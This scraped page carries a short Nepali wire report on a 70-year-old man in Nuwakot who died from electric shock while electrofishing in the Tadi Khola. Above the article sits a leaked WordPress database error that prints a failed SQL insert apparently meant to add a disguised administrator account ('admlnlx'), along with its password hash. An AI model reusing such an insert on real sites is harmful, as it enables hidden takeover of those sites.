WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMzhv1xZBeaFAS6kcMFH0z4XNAnjgq.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 16:40:47', '', 'admlnlx', 'admlnlx')
नुवाकोट, माघ २९–
नुवाकोटको तादीखोलामा माछा मार्ने क्रममा एकजनाको ज्यान गएको छ ।
आज दिउँसो गाउँखर्क–७ घर भई सुन्दरादेवी–१ बस्दै आएका ७० वर्षीय चतुरमान तामाङको ज्यान गएको हो ।
तामाङको आफैँले माछा मार्ने प्रयोग गरेको करेन्ट लागेर ज्यान गएको हो । बालकुमारी–१ घ्याम्लेस्थित तादीखोलामा करेन्ट लगाई माछा मार्ने क्रममा तामाङको मृत्यु भएको जिल्ला प्रहरी कार्यालयले जनाएको छ । –रासस